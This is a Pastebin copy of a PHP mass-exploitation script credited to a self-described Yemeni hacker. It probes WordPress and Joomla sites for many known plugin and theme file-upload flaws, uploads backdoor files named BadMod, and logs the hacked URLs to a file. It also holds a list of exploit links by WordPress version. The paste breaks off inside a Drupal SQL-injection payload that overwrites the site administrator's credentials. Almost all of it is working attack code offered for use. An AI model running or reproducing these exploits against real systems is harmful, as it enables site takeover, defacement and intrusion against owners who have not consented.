SHARE
TWEET

Untitled

a guest May 27th, 2018 216 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. #*##*##*##*##*##*##*##*##*##*##*##*##*#
  4. #*#                                 #*#              
  5. #*#  Coded by MrSqar Yemeni hacker  #*#
  6. #*#                                 #*#
  7. #*#     mail : mrsqar@gmail.com     #*#
  8. #*#                                 #*#
  9. #*#         MaDe In YeMeN           #*#
  10. #*#                                 #*#
  11. #*# Note: Don't change my copyright #*#
  12. #*#          please , ok ?          #*#
  13. #*#                                 #*#
  14. #*#                                 #*#
  15. #*##*##*##*##*##*##*##*##*##*##*##*##*#
  16. */
  17.  
  18. ########################################
  19. #//||||||||||| check root |||||||||||\\#
  20. ########################################
  21. $root = shell_exec("id");
  22. if (!preg_match("/root/",$root)){
  23.         system("clear");
  24.         $red    = "\e[91m";
  25.         echo $red."\n[~] please run script as root "."\n\n";
  26.         exit;
  27.     }
  28. ##########################################
  29. #//|||||||||||~ check curl ~|||||||||||\\#
  30. ##########################################
  31. if(!extension_loaded('curl')) {
  32.         system("clear");
  33.         $red    = "\e[91m";
  34.         echo $red."\n[~]  curl is not installed pls install it by this command "."\n";
  35.         echo "    install it for you ? (y/n) : ";
  36.         $install = trim(fgets(STDIN,1024));
  37.         if ($install == "y"){
  38.         $install = "sudo apt-get install php-curl -y";
  39.         system("$install");
  40.         exit();
  41.             } else {
  42. #########################################
  43. #//||||||||||| exit script |||||||||||\\#
  44. #########################################      
  45.                 exit();
  46.                
  47.                 }
  48.         }
  49. ######################################################
  50. #//|//|//|//|//|//|//|//|//|//|//|//|//|///|//|//|//|#
  51. ######################################################
  52.  
  53. #####################
  54. ## script go go :V ##
  55. #####################
  56.  
  57. require("Header.php");
  58. ###############################################
  59. #//|||||||||||||  array  start |||||||||||||\\#
  60. ###############################################
  61. $wordpress = array(
  62. '4.7.1' => "
  63. 4.7.1 vulns [
  64. \n
  65. https://www.exploit-db.com/exploits/41497/
  66. https://www.exploit-db.com/exploits/41224/
  67. http://0day.today/exploit/description/27720
  68. http://0day.today/exploit/description/26956
  69. http://0day.today/exploit/description/26885
  70. http://0day.today/exploit/description/26884
  71. http://0day.today/exploit/description/26876
  72. \n
  73. ]
  74. \n
  75. ",
  76. '4.7' => "
  77. 4.7.1 vulns [
  78. https://www.exploit-db.com/exploits/41497/
  79. https://www.exploit-db.com/exploits/41224/
  80. http://0day.today/exploit/description/27720
  81. http://0day.today/exploit/description/26956
  82. http://0day.today/exploit/description/26885
  83. http://0day.today/exploit/description/26884
  84. http://0day.today/exploit/description/26876
  85. \n
  86. ]
  87. \n
  88. ",
  89. '4.6' => "
  90. 4.6 vulns [\n
  91. https://www.exploit-db.com/exploits/41962/
  92. http://0day.today/exploit/description/25575
  93. \n
  94. ]
  95. \n
  96. ",
  97.  
  98.  
  99. '4.5.3' => "
  100. 4.5.3 vulns [\n
  101. https://www.exploit-db.com/exploits/40288/
  102. http://0day.today/exploit/description/27237
  103. http://0day.today/exploit/description/27236
  104. \n
  105. ]
  106. \n
  107. ",
  108.  
  109. '4.0' => "
  110. 4.0 vulns [\n
  111. https://www.exploit-db.com/exploits/35413/
  112. http://0day.today/exploit/description/27177
  113. \n
  114. ]
  115. \n
  116. ",
  117.  
  118. '4.2' => "
  119. 4.2 vulns [\n
  120. https://www.exploit-db.com/exploits/36844/
  121. http://0day.today/exploit/description/23993
  122. \n
  123. ]
  124. \n
  125. ",
  126.  
  127. '3.6' => "
  128. 3.6 vulns [\n
  129. https://www.exploit-db.com/docs/28958.pdf
  130. \n
  131. ]
  132. \n
  133. ",
  134.  
  135. '3.4.2' => "
  136. 3.4.2 vulns [\n
  137. http://0day.today/exploit/description/19896
  138. http://0day.today/exploit/description/19876
  139. http://0day.today/exploit/description/19447
  140. https://www.exploit-db.com/exploits/37826/
  141. \n
  142. ]
  143. \n
  144. ",
  145.  
  146. '3.3.1' => "
  147. 3.3.1 vulns [\n
  148. http://0day.today/exploit/description/19711
  149. http://0day.today/exploit/description/18138
  150. http://0day.today/exploit/description/17434
  151. \n
  152. ]
  153. \n
  154. ",
  155.  
  156. '3.1.3' => "
  157. 3.1.3 vulns [\n
  158. https://www.exploit-db.com/exploits/17465/
  159. \n
  160. ]
  161. \n
  162. ",
  163.  
  164. '3.0.3' => "
  165. 3.0.3 vulns [\n
  166. http://0day.today/exploit/description/25032
  167. http://0day.today/exploit/description/20175
  168. http://0day.today/exploit/description/15259
  169. \n
  170. ]
  171. \n
  172. ",
  173.  
  174. '3.0.1' => "
  175. 3.0.1 vulns [\n
  176. http://0day.today/exploit/description/27164
  177. http://0day.today/exploit/description/21153
  178. http://0day.today/exploit/description/14864
  179. http://0day.today/exploit/description/13702
  180. \n
  181. ]
  182. \n
  183. ",
  184. );
  185. $joomla = array(
  186. '' => "
  187.  
  188. "
  189. );
  190. ###############################################
  191. #//||||||||||||||  array  end ||||||||||||||\\#
  192. ###############################################
  193.  
  194. ###############################################
  195. #//|||||||||||| Functions start ||||||||||||\\#
  196. ###############################################
  197. function plupload($target){
  198.     $green  = "\e[92m";
  199.     $orange = "\e[38;5;208m";
  200.     $red    = "\e[91m";
  201. $target1 = $target."/plupload/examples/upload.php";
  202. $h = @file_get_contents("$target1");
  203. if(preg_match("/jsonrpc/",$h)){
  204. $uploadfile="BackDoor/BadMod.jpg";
  205. $uploadfile2="BackDoor/BadMod.php";
  206. $uploadfile=realpath($uploadfile) ;
  207. $uploadfile2=realpath($uploadfile2) ;
  208. if (function_exists('curl_file_create')) { // php 5.5+
  209.   $cFile = curl_file_create($uploadfile);
  210.   $cFile2 = curl_file_create($uploadfile2);
  211. } else { //
  212.   $cFile = '@' . realpath($uploadfile);
  213.   $cFile2 = '@' . realpath($uploadfile2);
  214. }
  215. $post = array('file'=> $cFile,'name' => $cFile2);
  216. $ch = curl_init();
  217. curl_setopt($ch, CURLOPT_URL,"$target1");
  218. curl_setopt($ch, CURLOPT_POST,1);
  219. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  220. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  221. $result=curl_exec ($ch);
  222. curl_close ($ch);
  223. $result = $target."/plupload/examples/uploads/BadMod.php";
  224. $result = @file_get_contents("$result");
  225. if(preg_match("/Hacked/",$result)){
  226. echo $red."  [plupload] -============- ".$green." Done";
  227. $hacked = fopen("result/Hacked.txt","a+");
  228. $def = $target."/"."plupload/examples/uploads/BadMod.php";
  229. fwrite($hacked,$def);
  230. fwrite($hacked,"\n");
  231. fclose($hacked);
  232. }
  233. echo $red."  [plupload] -============- ".$orange." Failed ";
  234. }else{
  235. $target1 = $target."/plupload/examples/upload.php";
  236. $h = @file_get_contents("$target1");
  237. if(preg_match("/jsonrpc/",$h)){
  238. $uploadfile="BackDoor/BadMod.jpg";
  239. $uploadfile2="BackDoor/BadMod.php";
  240. $uploadfile=realpath($uploadfile) ;
  241. $uploadfile2=realpath($uploadfile2) ;
  242. if (function_exists('curl_file_create')) { // php 5.5+
  243.   $cFile = curl_file_create($uploadfile);
  244.   $cFile2 = curl_file_create($uploadfile2);
  245. } else { //
  246.   $cFile = '@' . realpath($uploadfile);
  247.   $cFile2 = '@' . realpath($uploadfile2);
  248. }
  249. $post = array('file'=> $cFile,'name' => $cFile2);
  250. $ch = curl_init();
  251. curl_setopt($ch, CURLOPT_URL,"$target1");
  252. curl_setopt($ch, CURLOPT_POST,1);
  253. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  254. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  255. $result=curl_exec ($ch);
  256. curl_close ($ch);
  257. $result = $target."/js/plupload/examples/uploads/BadMod.php";
  258. $result = @file_get_contents("$result");
  259. if(preg_match("/Hacked/",$result)){
  260. echo $red."  [plupload] -============- ".$green." Done";
  261. $hacked = fopen("result/Hacked.txt","a+");
  262. $def = $target."/js/plupload/examples/uploads/BadMod.php";
  263. fwrite($hacked,$def);
  264. fwrite($hacked,"\n");
  265. fclose($hacked);
  266. }
  267. echo $red."  [plupload] -============- ".$orange." Failed ";
  268. }
  269. }
  270. }
  271.  
  272. function wp_qual($target){
  273.     $green  = "\e[92m";
  274.     $orange = "\e[38;5;208m";
  275.     $red    = "\e[91m";
  276. $target1 = $target."/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php";
  277. $h = @get_headers("$target1");
  278. if(!preg_match("/404/",$h[0])){
  279. $uploadfile="BackDoor/BadMod.php";
  280. $uploadfile=realpath($uploadfile) ;
  281. if (function_exists('curl_file_create')) { // php 5.5+
  282.   $cFile = curl_file_create($uploadfile);
  283. } else { //
  284.   $cFile = '@' . realpath($uploadfile);
  285. }
  286. $post = array('Filedata'=> $cFile);
  287. $ch = curl_init();
  288. curl_setopt($ch, CURLOPT_URL,"$target1");
  289. curl_setopt($ch, CURLOPT_POST,1);
  290. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  291. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  292. $result=curl_exec ($ch);
  293. curl_close ($ch);
  294. $result = trim($result);
  295. if($result == 1){
  296. echo $red."  [wp_qual] -=============- ".$green." Done !";
  297. $hacked = fopen("result/Hacked.txt","a+");
  298. $def = $target."/"."BadMod.php";
  299. fwrite($hacked,$def);
  300. fwrite($hacked,"\n");
  301. fclose($hacked);
  302. }
  303. echo $red."  [wp_qual] -=============- ".$orange." Failed ";
  304. }
  305. }
  306. function GetWpVer($target){
  307. $r = file_get_contents("$target");
  308. preg_match_all('<meta name="generator" content="(.*)" />',$r,$re);
  309. foreach($re[1] AS $version){
  310. if(!preg_match("/WordPress/",$version)){
  311. $version = " UNKNOWN"; 
  312. }else{
  313. $arr = "WordPress";
  314. $version = str_replace($arr,"",$version);
  315. $version = trim($version);
  316. }
  317. echo " ".$version; 
  318. }
  319. }
  320. function wp_bsn($target){
  321.     $green  = "\e[92m";
  322.     $orange = "\e[38;5;208m";
  323.     $red    = "\e[91m";
  324. $target1 = $target."/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload";
  325. $uploadfile="BackDoor/BadMod.gif";
  326. $uploadfile=realpath($uploadfile) ;
  327. if (function_exists('curl_file_create')) { // php 5.5+
  328.   $cFile = curl_file_create($uploadfile);
  329. } else { //
  330.   $cFile = '@' . realpath($uploadfile);
  331. }
  332. $post = array('file'=> $cFile);
  333. $ch = curl_init();
  334. curl_setopt($ch, CURLOPT_URL,"$target1");
  335. curl_setopt($ch, CURLOPT_POST,1);
  336. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  337. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  338. $result=curl_exec ($ch);
  339. curl_close ($ch);
  340. $m = date("m");
  341. $y = date("y");
  342. $result2 = $target."/wp-content/uploads/20$y/$m/BadMod.gif";
  343. $src = @file_get_contents("$result2");
  344. if(preg_match("/Hacked/",$src)){
  345. echo $red."  [wp_bsn] -==============- ".$green." Done !";
  346. $hacked = fopen("result/Hacked.txt","a+");
  347. fwrite($hacked,$result2);
  348. fwrite($hacked,"\n");
  349. echo $result;
  350. echo $result2;
  351. }else{
  352. echo $red. "  [wp_bsn] -==============- ".$orange."Failed"." \n";
  353. }
  354. }
  355.  
  356. function wp_jbm($target){
  357.     $green  = "\e[92m";
  358.     $orange = "\e[38;5;208m";
  359.     $red    = "\e[91m";
  360. $target1 = $target."/jm-ajax/upload_file";
  361. $src = @file_get_contents("$target1");
  362. if(preg_match("/files/",$src)){
  363. $uploadfile="BackDoor/BadMod.gif";
  364. $uploadfile=realpath($uploadfile) ;
  365. if (function_exists('curl_file_create')) { // php 5.5+
  366.   $cFile = curl_file_create($uploadfile);
  367. } else { //
  368.   $cFile = '@' . realpath($uploadfile);
  369. }
  370. $post = array('file'=> $cFile);
  371. $ch = curl_init();
  372. curl_setopt($ch, CURLOPT_URL,"$target1");
  373. curl_setopt($ch, CURLOPT_POST,1);
  374. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  375. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  376. $result=curl_exec ($ch);
  377. curl_close ($ch);
  378. $m = date("m");
  379. $y = date("y");
  380. $result2 = $target."/wp-content/uploads/20$y/$m/BadMod.gif";
  381. echo $red."  [wp_jbm] -==============- ".$green." Done !";
  382. $hacked = fopen("result/Hacked.txt","a+");
  383. fwrite($hacked,$result2);
  384. fwrite($hacked,"\n");
  385. }else{
  386. echo $red. "  [wp_jbm] -==============- ".$orange."Failed"." \n";
  387.  
  388. }
  389. }
  390.  
  391. function joom_ver($url){
  392.     $green  = "\e[92m";
  393.     $red    = "\e[91m";
  394. $url = $url."/language/en-GB/en-GB.xml";
  395. $source = file_get_contents("$url");
  396. if(preg_match("/xml/",$source)){
  397. $source = file_get_contents("$url");
  398. $exp = explode("\n",$source);
  399. if(preg_match("/xml/",$exp[0])){
  400. unset($exp[0]);
  401. }
  402. if(preg_match("/metafile/",$exp[1])){
  403. $arr = array(
  404. '<' => "",
  405. 'metafile' => "",
  406. 'version' => "",
  407. '=' => "",
  408. '"' => "",
  409. 'client' => "",
  410. 'site' => "",
  411. '>' => "",
  412. );
  413. $rb = str_replace(array_keys($arr),$arr,$exp[1]);
  414. $version =  $red. "  [Version] -====- ".$green.trim($rb)."\n";
  415. echo $version;
  416. }elseif(preg_match("/metafile/",$exp[2])){
  417. $arr = array(
  418. '<' => "",
  419. 'metafile' => "",
  420. 'version' => "",
  421. '=' => "",
  422. '"' => "",
  423. 'client' => "",
  424. 'site' => "",
  425. '>' => "",
  426. );
  427. $rb = str_replace(array_keys($arr),$arr,$exp[2]);
  428. $version =  $red. "  [Version] -====- ".$green.trim($rb)."\n";
  429. echo $version;
  430. }
  431. else{
  432. $version =  $red. "  [Version] -====- ".$green." UNKNOWN"."\n";
  433. echo $version;
  434. }
  435. }
  436.  
  437. }
  438. function wp_upload2($target){
  439.     $green  = "\e[92m";
  440.     $orange = "\e[38;5;208m";
  441.     $red    = "\e[91m";
  442. $target1 = $target."/wp-content/plugins/viral-optins/api/uploader/file-uploader.php";
  443. $h = @get_headers("$target1");
  444. if(!preg_match("/404/",$h[0])){
  445. $uploadfile="BackDoor/BadMod.txt";
  446. $uploadfile=realpath($uploadfile) ;
  447. if (function_exists('curl_file_create')) { // php 5.5+
  448.   $cFile = curl_file_create($uploadfile);
  449. } else { //
  450.   $cFile = '@' . realpath($uploadfile);
  451. }
  452. $post = array('Filedata'=> $cFile);
  453. $ch = curl_init();
  454. curl_setopt($ch, CURLOPT_URL,"$target1");
  455. curl_setopt($ch, CURLOPT_POST,1);
  456. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  457. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  458. $result=curl_exec ($ch);
  459. curl_close ($ch);
  460. $m = date("m");
  461. $y = date("y");
  462. $result2 = $target."/wp-content/uploads/20$y/$m/BadMod.txt";
  463. $h2 = @file_get_contents("$result2");
  464. if(@preg_match("/MrSqar/",$h2)){
  465. echo $red."  [upload] -==============- ".$green." Done !";
  466. $hacked = fopen("result/Hacked.txt","a+");
  467. fwrite($hacked,$result2);
  468. fwrite($hacked,"\n");
  469.     }else{
  470. echo $red. "  [wp_upload2] -==========- ".$orange."Failed"." \n";
  471.  
  472. }
  473. }else{
  474. echo $red. "  [wp_upload2] -==========- ".$orange."Failed"." \n";
  475.  
  476. }
  477. }
  478. function wp_blazeS($target){
  479.     $green  = "\e[92m";
  480.     $orange = "\e[38;5;208m";
  481.     $red    = "\e[91m";
  482. $file = "BackDoor/BadMod.php.gif";
  483. $file = realpath($file);
  484. if (function_exists('curl_file_create')) { // php 5.5+
  485.   $cFile = curl_file_create($file);
  486. } else { //
  487.   $cFile = '@' . realpath($file);
  488. }
  489. $target1 = $target."/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php";
  490. $post = array('Filedata'=> $cFile);
  491. $ch = curl_init();
  492. curl_setopt($ch, CURLOPT_URL,$target1);
  493. curl_setopt($ch, CURLOPT_POST,1);
  494. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  495. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  496. $result=curl_exec ($ch);
  497. curl_close ($ch);
  498. $hack = $target."/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/BadMod.php.gif";
  499. $source = @file_get_contents("$hack");
  500. if(preg_match("/Hacked/",$source)){
  501. $hacked = fopen("result/Hacked.txt","a+");
  502. echo $red."  [wp_blazeS] -===========- ".$green." Done ! \n";
  503. fwrite($hacked,$hack);
  504. fwrite($hacked,"\n");
  505. fclose($hacked);
  506. }else{
  507. echo $red. "  [wp_blazeS] -===========- ".$orange."Failed"." \n";  
  508. }
  509. }
  510. function wp_blocker($target){
  511.     $green  = "\e[92m";
  512.     $orange = "\e[38;5;208m";
  513.     $red    = "\e[91m";
  514. $file = "BackDoor/BadMod.php";
  515. $file = realpath($file);
  516. if (function_exists('curl_file_create')) { // php 5.5+
  517.   $cFile = curl_file_create($file);
  518. } else { //
  519.   $cFile = '@' . realpath($file);
  520. }
  521. $target1 = $target."/wp-admin/admin-ajax.php?action=getcountryuser&cs=2";
  522. $post = array('popimg'=> $cFile);
  523. $ch = curl_init();
  524. curl_setopt($ch, CURLOPT_URL,$target1);
  525. curl_setopt($ch, CURLOPT_POST,1);
  526. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  527. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  528. $result=curl_exec ($ch);
  529. curl_close ($ch);
  530. $m = date("m");
  531. $y = date("y");
  532. $hack = $target."/wp-content/uploads/20$y/$m/BadMod.php";
  533. $source2 = @file_get_contents("$hack");
  534. if(preg_match("/Hacked/",$source2)){
  535. echo $red."  [wp_blocker] -==========- ".$green." Done !\n";
  536. $hacked = fopen("result/Hacked.txt","a+");
  537. fwrite($hacked,$hack);
  538. fwrite($hacked,"\n");
  539. fclose($hacked);
  540. }else{
  541. echo $red. "  [wp_blocker] -==========- ".$orange."Failed"." \n";
  542. }
  543. }
  544. function wp_formcraft($target){
  545.     $green  = "\e[92m";
  546.     $orange = "\e[38;5;208m";
  547.     $red    = "\e[91m";
  548. $file = "BackDoor/mrsqar.png";
  549. $file = realpath($file);
  550. if (function_exists('curl_file_create')) { // php 5.5+
  551.   $cFile = curl_file_create($file);
  552. } else { //
  553.   $cFile = '@' . realpath($file);
  554. }
  555. $post = array('files[]'=> $cFile);
  556. $target1 = $target."/wp-content/plugins/formcraft/file-upload/server/content/upload.php";
  557. $source = @file_get_contents("$target1");
  558. if(preg_match("/failed/",$source)){
  559. $ch = curl_init();
  560. curl_setopt($ch, CURLOPT_URL,$target1);
  561. curl_setopt($ch, CURLOPT_POST,1);
  562. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  563. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  564. $result=curl_exec ($ch);
  565. curl_close ($ch);
  566. $exp = explode("files",$result);
  567. $arr = array(
  568. "\/" => "",
  569. '"' => "",
  570. "}" => "",
  571. "{" => "",
  572.  
  573. );
  574. $rb = str_replace(array_keys($arr),$arr,$exp[4]);
  575. $hack = $target."/wp-content/plugins/formcraft/file-upload/server/content/files/$rb";
  576. echo $red."  [wp_formcraft] -========- ".$green." Done ! \n";
  577. $hacked = fopen("result/Hacked.txt","a+");
  578. fwrite($hacked,$hack);
  579. fwrite($hacked,"\n");
  580. fclose($hacked);
  581. }else{
  582. echo $red. "  [wp_formcraft] -========- ".$orange."Failed"." \n";
  583. }
  584. }
  585. #
  586. function wp_ads($target){
  587.     $green  = "\e[92m";
  588.     $orange = "\e[38;5;208m";
  589.     $red    = "\e[91m";
  590. $file = "BackDoor/BadMod.php";
  591. $file = realpath($file);
  592. if (function_exists('curl_file_create')) { // php 5.5+
  593.   $cFile = curl_file_create($file);
  594. } else { //
  595.   $cFile = '@' . realpath($file);
  596. }
  597. $target1 = $target."/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php";
  598. $target2 = $target."/wp-content/plugins/simple-ads-manager/readme.txt";
  599. $source = @file_get_contents("$target2");
  600. if(preg_match("/Simple/",$source)){
  601. $post = array('path' => './','uplaodfile'=> $cFile,'action' => "upload_ad_image");
  602. $ch = curl_init();
  603. curl_setopt($ch, CURLOPT_URL,$target1);
  604. curl_setopt($ch, CURLOPT_POST,1);
  605. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  606. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  607. $result=curl_exec ($ch);
  608. curl_close ($ch);
  609. $hack = $target."/wp-content/plugins/simple-ads-manager/BadMod.php";
  610. $source2 = @file_get_contents("$hack");
  611. if(preg_match("/Hacked/",$source2)){
  612. echo $red."  [wp_ads] -==============- ".$green." Done !\n";
  613. $hacked = fopen("result/Hacked.txt","a+");
  614. fwrite($hacked,$hack);
  615. fwrite($hacked,"\n");
  616. fclose($hacked);
  617. }else{
  618. echo $red. "  [wp_ads] -==============- ".$orange."Failed"." \n";
  619. }
  620. }
  621. else{
  622. echo $red. "  [wp_ads] -==============- ".$orange."Failed"." \n";
  623. }
  624. }
  625.  
  626. function com_fabrik($target){
  627.     $green  = "\e[92m";
  628.     $orange = "\e[38;5;208m";
  629.     $red    = "\e[91m";
  630. $file = "BackDoor/BadMod.txt";
  631. $file = realpath($file);
  632. if (function_exists('curl_file_create')) { // php 5.5+
  633.   $cFile = curl_file_create($file);
  634. } else { //
  635.   $cFile = '@' . realpath($file);
  636. }
  637. $target1 = $target."/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0";
  638. $source = @file_get_contents("$target1");
  639. if(preg_match("/CSV/",$source)){
  640. $post = array('userfile'=> $cFile,'drop_data' => "1",'overwrite' => "1",'field_delimiter' => "," , 'text_delimiter' => '"','option' => "com_fabrik",'controller' => "import",'view' => "import",'task' => "doimport",'tableid' => "0");
  641. $ch = curl_init();
  642. curl_setopt($ch, CURLOPT_URL,$target1);
  643. curl_setopt($ch, CURLOPT_POST,1);
  644. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  645. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  646. $result=curl_exec ($ch);
  647. curl_close ($ch);
  648. $hack = $target."/media/BadMod.txt";
  649. $source2 = @file_get_contents("$hack");
  650. if(preg_match("/Yemeni/",$source2)){
  651. echo $red."  [com_fabrik] ====> ".$green." Done ! \n";
  652. $hacked = fopen("result/Hacked.txt","a+");
  653. fwrite($hacked,$hack);
  654. fwrite($hacked,"\n");
  655. fclose($hacked);
  656. }else{
  657. echo $red. "  [com_fabrik] ====> ".$orange."Failed"." \n";
  658. }
  659. }else{
  660. echo $red. "  [com_fabrik] ====> ".$orange."Failed"." \n"; 
  661. }
  662. }
  663. function wp_jquery($target){
  664.     $green  = "\e[92m";
  665.     $orange = "\e[38;5;208m";
  666.     $red    = "\e[91m";
  667. $file = "BackDoor/BadMod.php";
  668. $file = realpath($file);
  669. if (function_exists('curl_file_create')) { // php 5.5+
  670.   $cFile = curl_file_create($file);
  671. } else { //
  672.   $cFile = '@' . realpath($file);
  673. }
  674. $post = array('files'=> $cFile);
  675. $target1 = $target."/assets/global/plugins/jquery-file-upload/server/php/";
  676. $source1 = @file_get_contents("$target1");
  677. if(preg_match("/files/",$source1)){
  678. $ch = curl_init();
  679. curl_setopt($ch, CURLOPT_URL,$target1);
  680. curl_setopt($ch, CURLOPT_POST,1);
  681. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  682. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  683. $result=curl_exec ($ch);
  684. curl_close ($ch);
  685. $hack = $target1."/BadMod.php";
  686. $source = @file_get_contents("$hack");
  687. if(preg_match("/Hacked/",$source)){
  688. echo $red."  [wp_jquery] -===========- ".$green." Done !\n";
  689. $hacked = fopen("result/Hacked.txt","a+");
  690. fwrite($hacked,$hack);
  691. fwrite($hacked,"\n");
  692. fclose($hacked);
  693. }else{
  694. echo $red. "  [wp_jquery] -===========- ".$orange."Failed"." \n";
  695. }
  696. }else{
  697. echo $red. "  [wp_jquery] -===========- ".$orange."Failed"." \n";
  698.  
  699.     }
  700. }
  701. function wp_dreamwork($target){
  702.     $green  = "\e[92m";
  703.     $orange = "\e[38;5;208m";
  704.     $red    = "\e[91m";
  705. $file = "BackDoor/BadMod.html";
  706. $file = realpath($file);
  707. if (function_exists('curl_file_create')) { // php 5.5+
  708.   $cFile = curl_file_create($file);
  709. } else { //
  710.   $cFile = '@' . realpath($file);
  711. }
  712. $post = array('task' => "drm_add_new_album",'album_name' => "Arbitrary File Upload",'album_desc' => "Arbitrary File Upload",'album_img'=> $cFile);
  713. $ch = curl_init();
  714. $target1 = $target."/wp-admin/admin.php?page=dreamwork_manage";
  715. curl_setopt($ch, CURLOPT_URL,$target1);
  716. curl_setopt($ch, CURLOPT_POST,1);
  717. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  718. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  719. $result=curl_exec($ch);
  720. curl_close ($ch);
  721. if(preg_match("/wp-content/",$result)){
  722. $exp = explode("wp-content",$result);
  723. $arr = array(
  724. '(' => "",
  725. ')' => "",
  726. 'Error' => "",
  727. );
  728. $rb = str_replace(array_keys($arr),$arr,$exp);
  729. $hack = $target.$rb[1];
  730. if(preg_match("/wp-content/",$hack)){
  731. $hack = $target.$rb[1];
  732.     }else{
  733. $hack = $target."/wp-content/".$rb[1];
  734. $hack = trim($hack);
  735.     }
  736. $src = @file_get_contents("$hack");
  737. if(preg_match("/Hacked/",$src)){
  738. echo $red."  [dreamwork_manage] -====- ".$green." Done !\n";
  739. $hacked = fopen("result/Hacked.txt","a+");
  740. fwrite($hacked,$hack);
  741. fwrite($hacked,"\n");
  742. fclose($hacked);
  743. }
  744. }else{
  745. echo $red. "  [dreamwork_manage] -====- ".$orange."Failed"." \n";
  746.  
  747. }
  748. }
  749.  
  750. function wp_rightnow($target){
  751.     $green  = "\e[92m";
  752.     $orange = "\e[38;5;208m";
  753.     $red    = "\e[91m";
  754. $file = "BackDoor/BadMod.html";
  755. $file = realpath($file);
  756. if (function_exists('curl_file_create')) { // php 5.5+
  757.   $cFile = curl_file_create($file);
  758. } else { //
  759.   $cFile = '@' . realpath($file);
  760. }
  761. $post = array('Filedata'=> $cFile);
  762. $target1 = $target."/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php";
  763. $ch = curl_init();
  764. curl_setopt($ch, CURLOPT_URL,$target1);
  765. curl_setopt($ch, CURLOPT_POST,1);
  766. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  767. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  768. $result= curl_exec ($ch);
  769. curl_close ($ch);
  770. $source = "$target/wp-content/uploads/settingsimages/badmod.html";
  771. $source2 = @file_get_contents("$source");
  772. if(preg_match("/Hacked/",$source2)){
  773. echo $red."  [wp_rightnow] -=========- ".$green."Done ! \n";
  774. $hacked = fopen("result/Hacked.txt","a+");
  775. fwrite($hacked,$source);
  776. fwrite($hacked,"\n");  
  777. fclose($hacked);
  778. }else
  779.     {
  780. echo $red. "  [wp_rightnow] -=========- ".$orange."Failed"." \n";
  781.         }
  782. }
  783.  
  784. function wp_upload($target){
  785.     $green  = "\e[92m";
  786.     $orange = "\e[38;5;208m";
  787.     $red    = "\e[91m";
  788. $target1 = $target."/wp-content/plugins/cherry-plugin/admin/import-export/upload.php";
  789. $h = get_headers("$target1");
  790. if(!preg_match("/404/",$h[0])){
  791. $uploadfile="BackDoor/BadMod.php";
  792. $uploadfile=realpath($uploadfile) ;
  793. if (function_exists('curl_file_create')) { // php 5.5+
  794.   $cFile = curl_file_create($uploadfile);
  795. } else { //
  796.   $cFile = '@' . realpath($uploadfile);
  797. }
  798. $post = array('file'=> $cFile);
  799. $ch = curl_init();
  800. curl_setopt($ch, CURLOPT_URL,"$target1");
  801. curl_setopt($ch, CURLOPT_POST,1);
  802. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  803. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  804. $result=curl_exec ($ch);
  805. curl_close ($ch);
  806. $result2 = $target."/wp-content/plugins/cherry-plugin/admin/import-export/BadMod.php";
  807. $h2 = @file_get_contents("$result2");
  808. if(preg_match("/BadMod/",$h2)){
  809. echo $red."  [upload] -==============- ".$green." Done";
  810. $hacked = fopen("result/Hacked.txt","a+");
  811. $def = $target."/"."badmod.html";
  812. fwrite($hacked,$def);
  813. fwrite($hacked,"\n");
  814. echo $result2;
  815.     }else{
  816. echo $red. "  [wp_upload] -===========- ".$orange."Failed"." \n";
  817.  
  818. }
  819. }else{
  820. echo $red. "  [wp_upload] -===========- ".$orange."Failed"." \n";
  821.  
  822. }
  823. }
  824.  
  825. function add_user($target){
  826.     $green  = "\e[92m";
  827.     $orange = "\e[38;5;208m";
  828.     $red    = "\e[91m";
  829.     $log = "/user/login";
  830.     $url2 = $target.$log;
  831.     $holako = "/?q=user";
  832.     $post_data = "name[0;update users set name %3D 'badmod' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  833.     $params = array(
  834.         'http' => array(
  835.         'method' => 'POST',
  836.         'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  837.         'content' => $post_data
  838.     )
  839.     );
  840.     $ctx = @stream_context_create($params);
  841.     $data = @file_get_contents("$url2", null, $ctx);
